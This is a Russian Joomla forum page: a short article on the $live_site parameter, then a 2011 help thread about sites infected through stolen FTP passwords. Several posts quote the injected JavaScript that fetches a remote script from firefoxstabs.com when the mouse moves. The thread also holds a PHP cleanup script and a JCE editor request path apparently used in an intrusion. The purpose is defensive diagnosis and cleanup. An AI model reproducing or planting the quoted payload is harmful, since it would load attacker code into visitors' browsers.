Новости Joomla

Загадочный параметр $live_site в configuration.php Joomla

Загадочный параметр $live_site в configuration.php Joomla

Давным-давно, когда Joomla ещё была маленькой, в неё внедрили параметр $live_site. В ней хранился домен текущего сайта на случай, если Joomla не могла его определить из-за неверной настройки сервера. Нужно это было для разных SEO-компонентов, для использования редиректов и т.д.

Со временем для работы собственно сайта этот параметр перестал быть нужным. Уже в начале 2010-х стали встречаться рекомендации оставлять этот параметр пустым, дабы оный не привёл к лишним проблемам и путанице. Тем более, в web-админке нет места, где его можно указать или посмотреть его значение. Только в configuration.php, а туда смотрят не часто.

Однако, параметр всё же остался в ядре Joomla. Зачем он нужен? А нужен он в 2-х случаях:

  • для работы класса Joomla\CMS\Uri\Uri, который часто используется в коде Joomla для работы методов
    Uri::root() и
    Uri::base(), а значит может влиять и на работу в том числе ajax-скриптов.
  • для работы Joomla в CLI - командной строке сервера. В случае если вы используете в вашем CLI-плагине методы опять-таки класса Uri, то CLI ничего не знает о текущем домене, так как запускается вне web-сервера.

Поэтому домен нужно указывать принудительно. Либо с помощью параметра командной строки

--live-site, например,
—live-site=https://site.ru/. Со слешем на конце, иначе в CLI адрес сайта станет
https://site.rujoomla.php.Либо в параметре
$live_site в файле configuration.php, так как
CliApplication берёт настройку оттуда, если параметр команды не указан или пуст.

⚠️ Иначе в качестве хоста и url класса Uri будет установлено https://joomla.invalid/set/by/console/application. В самом же коде команды получить параметр

$live_site можно из объекта приложения

<?php protected function doExecute(InputInterface $input, OutputInterface $output): int { //... $live_site = $this->getApplication()->get('live_site'); //... }

и исходя из этого строить дальнейшую логику.

0 Пользователей и 1 Гость просматривают эту тему.
  • 24 Ответов
  • 16796 Просмотров
*

Sedoy

  • Давно я тут
  • 897
  • 87 / 10
  • Интересно,в какой кодировке пишут врачи?
J1522 + апдейт до 23
вот такую штуку дописывает в php файлы:

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>

кто сталкивался и как лечить, вернее, что искать
на хабре вот что говорят http://habrahabr.ru/qa/7466/
http://forum.searchengines.ru/showthread.php?p=8945322

права на файлы 644
фтп пароль был сменен и нигде не хранился

вообще стало появляться после прописи гугловского скрипта аналистика в шаблоне
но это может быть просто совпадение
есть идеи?
« Последнее редактирование: 17.05.2011, 13:08:21 от Sedoy »
Что б правильно задать вопрос - нужно знать на него ответ!
FAQ по Joomla!
Где скачать шаблоны Joomla Статьи и обзоры Желаю Вам здоровья в личной жизни - живите долго и часто :)
*

Gruz

  • Завсегдатай
  • 1275
  • 167 / 3
  • gruz@jabber.org | gruz.org.ua
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #1 : 17.05.2011, 13:33:28 »
Точно в .php на сервере? Или при просмотре кода страницы в бравзере это видно?
Судя по виду, это код аналитики Google.
Життя має дві форми - горіння і гниття!
-
Со мной на "ты" - Вам лень развёрнуто формулировать вопрос? Нам лень отвечать. Правильный вопрос: - Версии J! и проблемного расширения? - Что хотел? - Что пробовал? - Что получилось и что не получилось? - Какие были ошибки?
*

abbyevg

  • Захожу иногда
  • 82
  • 6 / 0
  • эвилпанда
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #2 : 17.05.2011, 14:25:35 »
Ну правильно по ссылкам говорят, если дописано во все файлы, значит вирь. Разок ловил что-то подобное, вирь на компе считывал сохраненные в тотал коммандере ftp-пароли и отправлял куда следует. После этого перестал сохранять там пароли.
Если только в браузере, то могут и плагины браузера что-то дописывать
« Последнее редактирование: 17.05.2011, 14:32:07 от abbyevg »
*

Sedoy

  • Давно я тут
  • 897
  • 87 / 10
  • Интересно,в какой кодировке пишут врачи?
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #3 : 17.05.2011, 16:50:42 »
тоже думал, что Google выеживается
у аналитики вроде другой код, подобный вроде как у гуглмап

на "своей" практике - j1509 прописал во все (практически) index, menu и т.д.   
на j1522 (23) в index шаблона и в \libraries\joomla\html\html\menu.php

возможно еще куда-то, все не просматривал

изначально прописывался внизу кода и выдавал ошибку типа парсер еррор и файл строка ##
"лечил" тупо заменой
затем выловил его в коде шаблона выше футера - ошибок не выдавал, но кроме него там сидел еще див внутри которого была ссыла на левый сайт
причем ссыла была только в генерированном коде странице,
<div style="display: none;"><a href="http://www.relady.ru/">Fashion</a></div><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">

в самом index.php шаблона был только скрипт

по ссылам почитай, там такое ловят и на Wordpressе и т.д., не только на joomla

трабла в том что если это троян, то пока не найду кого "ловить" - никто не знает вроде, я не нашел по крайней мере


Что б правильно задать вопрос - нужно знать на него ответ!
FAQ по Joomla!
Где скачать шаблоны Joomla Статьи и обзоры Желаю Вам здоровья в личной жизни - живите долго и часто :)
*

Gruz

  • Завсегдатай
  • 1275
  • 167 / 3
  • gruz@jabber.org | gruz.org.ua
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #4 : 17.05.2011, 16:57:33 »
Ну... Я могу одно посоветовать. Поставить с нуля копию Joomla на локалке, те же самые расширения, и сравнить все файлы дабы уличить заражённые в продажности и узреть лишние.
Возможно вредоносный код каким-то образом в БД попал, оттуда что-то его исполняет. Тогда не знаю даже, что делать.
Життя має дві форми - горіння і гниття!
-
Со мной на "ты" - Вам лень развёрнуто формулировать вопрос? Нам лень отвечать. Правильный вопрос: - Версии J! и проблемного расширения? - Что хотел? - Что пробовал? - Что получилось и что не получилось? - Какие были ошибки?
*

Sedoy

  • Давно я тут
  • 897
  • 87 / 10
  • Интересно,в какой кодировке пишут врачи?
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #5 : 17.05.2011, 17:35:51 »
дубликат есть, сначала же локально делалось
оттуда кста и восстанавливал

вот народ наваял скриптик:

"
<?php
define ('BR', "<br />\r\n");
$srch='<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript(\'http://firefoxstabs.com/\' + Math.random().toString().substring(3) + \'.js\', function() {flag = 2;});}});});</script>';

function clean_file($file){
global $srch;
    $basename=basename($file);
    $filename=substr($basename, 0, strrpos($basename, '.'));
    if ($filename=='index' or $filename=='header' or $filename=='top' or $filename=='menu' or $filename=='footer' or $filename=='default') {
        $f_in=file_get_contents($file);
        if (strpos($f_in, $srch)!=false) {
            print($file.BR);
            $f_in=str_replace($srch, '', $f_in);
            file_put_contents($file, $f_in);
        }
    }
}

function firefoxtabs_remover($dir){
    if ($objs = glob($dir."/*")) {
        foreach($objs as $obj) {
            if (is_dir($obj)) firefoxtabs_remover($obj);
            else clean_file($obj);
        }
    }
}

$dir=realpath('./');
firefoxtabs_remover($dir);
?>
код ищет файлы от корня с именами
index
menu
header
top
footer
default
в них ищет вредоносный код и удаляет его"

но так как не кодер, рекомендовать его не могу, сам не тестил
вот что народ еще пишет:

"Что то после чистки скриптом у меня отваливаются bbcodes и еще не могу залогинеться. Чистил кэш на сайте и в браузере. После чистки скриптом в админке автоматом переключается на функцию сжатие js файлов принудительно.

Короче, заипал этот вирус. Уже надоело перезаливать файлы. В ручную

alextrish добавил 16.05.2011 в 05:39
Сейчас пробежался по шаблонам, короче в шаблоне в папке js во всех файлах js появилось уже такое:
Цитата:
document.write('<scr'+'ipt src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});
"

у меня пока, что внешних признаков нет, после чистки
но посмотрим, что будет через день-другой








Что б правильно задать вопрос - нужно знать на него ответ!
FAQ по Joomla!
Где скачать шаблоны Joomla Статьи и обзоры Желаю Вам здоровья в личной жизни - живите долго и часто :)
*

yuri-it

  • Давно я тут
  • 994
  • 44 / 3
  • Быстрый хостинг https://jehost.ru
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #6 : 17.05.2011, 18:00:40 »
J1522 + апдейт до 23
вот такую штуку дописывает в php файлы:

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>

кто сталкивался и как лечить, вернее, что искать
на хабре вот что говорят http://habrahabr.ru/qa/7466/
http://forum.searchengines.ru/showthread.php?p=8945322

случилось такое в эти выходные - код тот же. он пишет в конец файлов Index.php index.html default.php и некоторые JS это код. Мне удалось восстановить все, но как скрипт залез не знаю. Сменил пароли - пока все ок. Хотя косяк был - пароль был сохранен на Пк, но что-то подсказывает что не в этом дело т.к. другие были и другие пароли сохранены для других сайтов, а с ними все ок.
По-настоящему быстрый хостинг для Joomla : https://jehost.ru
Отзывы: http://joomlaforum.ru/index.php/topic,109288.0.html
Отзывы по хостингу http://hosting101.ru/jehost.ru
*

yuri-it

  • Давно я тут
  • 994
  • 44 / 3
  • Быстрый хостинг https://jehost.ru
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #7 : 17.05.2011, 18:24:13 »
По любому троян. касперыч тупил забил на него, щас поставил заного и нашел пару троянов на компе.
По-настоящему быстрый хостинг для Joomla : https://jehost.ru
Отзывы: http://joomlaforum.ru/index.php/topic,109288.0.html
Отзывы по хостингу http://hosting101.ru/jehost.ru
*

Gruz

  • Завсегдатай
  • 1275
  • 167 / 3
  • gruz@jabber.org | gruz.org.ua
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #8 : 17.05.2011, 18:25:19 »
Я так думаю, что этот код не може быть самостоятельным. Он всего навсего подключает библиотеку JQuery. Должно быть что-то ещё, что использует функции библиотеки.

А, не досмотрел. Есть такое в коде.
Життя має дві форми - горіння і гниття!
-
Со мной на "ты" - Вам лень развёрнуто формулировать вопрос? Нам лень отвечать. Правильный вопрос: - Версии J! и проблемного расширения? - Что хотел? - Что пробовал? - Что получилось и что не получилось? - Какие были ошибки?
*

Sulpher

  • Живу я здесь
  • 2126
  • 402 / 16
  • Шаблоны и расширения Joomla
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #9 : 18.05.2011, 01:35:21 »
Радион, это однозначно троян. Сталкивались с таким. У прогера комп был заражен и в FTP менеджере сохраненный пароль к сайту - вот и полезла такая прелесть во все php файлы.
*

oppo

  • Захожу иногда
  • 365
  • 82 / 8
  • ΨΨΨ я - УКРАЇНЕЦЬ
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #10 : 18.05.2011, 14:06:32 »
вирус это
« Последнее редактирование: 19.05.2011, 12:27:42 от oppo »
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #11 : 18.05.2011, 14:20:58 »
Вот только позавчера вычистил эту бяку с demo.joomlatune.com, там она появилась 100% по FTP (FTP использовался как промежуточный сервер как минимум 3 людьми, и один похоже поймал трояна). Откатили бекап, поменяли пароли и все нормально.
*

julada

  • Новичок
  • 2
  • 0 / 0
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #12 : 18.05.2011, 16:29:23 »
м-да, и я попала
*

Sedoy

  • Давно я тут
  • 897
  • 87 / 10
  • Интересно,в какой кодировке пишут врачи?
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #13 : 19.05.2011, 11:38:52 »
сенкс за скрипт :)

правда пока, что все ок, после "чистки" уже пару дней

не нравится он сам себе :)

Вирусов:нет
Warning: copy(Z:\home\soft\www/op_index.html) [function.copy]: failed to open stream: No such file or directory in Z:\home\soft\www\alena_virus_oppo_ext.php on line 76


что значит подозрительный?

  • Путь: Z:\home\soft\www/components/com_oziogallery2/assets/highslide/index.html Файл подозрительный. Размер: 3141



а что за троян то?
антивири его не ловят что ли?

« Последнее редактирование: 19.05.2011, 13:37:39 от Sedoy »
Что б правильно задать вопрос - нужно знать на него ответ!
FAQ по Joomla!
Где скачать шаблоны Joomla Статьи и обзоры Желаю Вам здоровья в личной жизни - живите долго и часто :)
*

oppo

  • Захожу иногда
  • 365
  • 82 / 8
  • ΨΨΨ я - УКРАЇНЕЦЬ
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #14 : 19.05.2011, 12:30:20 »
сенкс за скрипт :)
не нравится он сам себе :)
Вирусов:нет
Warning: copy(Z:\home\soft\www/op_index.html) [function.copy]: failed to open stream: No such file or directory in Z:\home\soft\www\alena_virus_oppo_ext.php on line 76
а поправлю тогда ... то он переписывает зараженный на чистый op_index.html - был на сервере зпасной
*

makhmudov.timur

  • Захожу иногда
  • 341
  • 20 / 0
  • Alshanskiy
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #15 : 23.05.2011, 18:57:58 »
я тоже поймал такой код на сайтах
причем поймал код, когда полезли ошибки
щас перезалил жумлу 1 5 23
теперь сайт начали ломать через иньекции
сломали через ком контент, когда вводили иньекцию
могли только менять материалы, больше ничего делать не получалось
но они как то картинку залили в имажес/сториес и я тут задумался, как через фтп? или просто через менеджер
да и ладно
вопрос в след, есть такая прога хранения паролей
http://keepass.info/ в ней хранить безопасно?
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #16 : 23.05.2011, 19:21:37 »
щас перезалил жумлу 1 5 23
теперь сайт начали ломать через иньекции
сломали через ком контент, когда вводили иньекцию
чушь, никаких инъекций на оригинальном com_content в Joomla 1.5.23 нет...
*

Mihanja80

  • Завсегдатай
  • 1918
  • 168 / 4
  • Всю жизнь учусь...
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #17 : 23.05.2011, 19:22:20 »
пароли лучше хранить в Бумажном блокноте!
Я с мобильного, в основном...
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #18 : 23.05.2011, 21:23:23 »
пароли лучше хранить в Бумажном блокноте!
написанные простым карандашом!
*

makhmudov.timur

  • Захожу иногда
  • 341
  • 20 / 0
  • Alshanskiy
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #19 : 24.05.2011, 05:29:20 »
чушь, никаких инъекций на оригинальном com_content в Joomla 1.5.23 нет...
могу скинуть логи!
они ввдили иньекции через ком_контент и через ком_файерьирд
форума у меня нет, другие расширения все легальные и нет варезных
(sh404sef, Xmap, joomleague, jcomments, apolls? gk_tabs, mad4joomla, jce) все они легальные...
так вот, читаю логи, обнаружил, что они ломали через иньекции
что смогли сделать:
смогли заменить все материалы, которые были на главной своим текстом
и с папку images/stories/ смогли закинуть свою картинку
в остальном вроде всё тихо.

Что сделал я..
сменил пароли юверов доступных к редактору
сменил имя и БД и пользователя БД и пароль на 130 битные
сменил пароли на ФТП...
Хостер, заблочил айпи адреса с которых ломали 66.249.68.27 88.85.98.202
могу скинуть логи, почитайте, убедитесь... мож я чё и не понял

пароли лучше хранить в Бумажном блокноте!
написанные простым карандашом!
Очень смешно )
*

makhmudov.timur

  • Захожу иногда
  • 341
  • 20 / 0
  • Alshanskiy
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #20 : 24.05.2011, 06:13:02 »
изучал логи, нашел строку, где они мне картинку вставляют
испытал на своем сайте
"component/option,com_jce/cid,20/file,imgmanager/lang,ru/plugin,imgmanager/task,plugin/version,1579/"
подгружаеться реадктор )

и подскажите мне, что это такое?
http://www.football.uz/plugins/editors/jce/tiny_mce/plugins/searchreplace/editor_plugin.js?version=1579&cid=20
что выходит при этом?
*

nexter

  • Осваиваюсь на форуме
  • 17
  • 1 / 0
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #21 : 25.05.2011, 07:48:43 »
изучал логи, нашел строку, где они мне картинку вставляют
испытал на своем сайте
"component/option,com_jce/cid,20/file,imgmanager/lang,ru/plugin,imgmanager/task,plugin/version,1579/"
подгружаеться реадктор )
у меня не подгружается-403 запрет дает. посмотрите права на папку
*

effrit

  • Легенда
  • 10132
  • 1118 / 13
  • effrit.com
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #22 : 25.05.2011, 08:24:55 »
так там же написано - com_jce.
я так понимаю, что тут через функцию внешнего редактора JCE идёт взлом. следовательно, надо на сайте JCE и мониторить обновление.
*

makhmudov.timur

  • Захожу иногда
  • 341
  • 20 / 0
  • Alshanskiy
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #23 : 25.05.2011, 20:33:40 »
так там же написано - com_jce.
я так понимаю, что тут через функцию внешнего редактора JCE идёт взлом. следовательно, надо на сайте JCE и мониторить обновление.
я как бы заметил, что там это написано ) обновил редактор, сразу стало выходить 403 )
*

namor

  • Новичок
  • 1
  • 0 / 0
Re: AJAX.googleapis.com - вирус или дырка Joomla?
« Ответ #24 : 26.05.2011, 01:30:30 »
Та же хрень, осуществлён доступ через фтп и дописан фрагмент кода.
При чём доступ осуществлялся неоднократно.
Если кому интересно - логи доступа ко всем зараженным файлам здесь
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как выявить вредоностный код на CMS Joomla?

Автор stud_pro

Ответов: 1
Просмотров: 1871
Последний ответ 23.04.2024, 10:06:10
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 2527
Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 2524
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 4383
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3215
Последний ответ 22.02.2022, 11:38:15
от AlexP750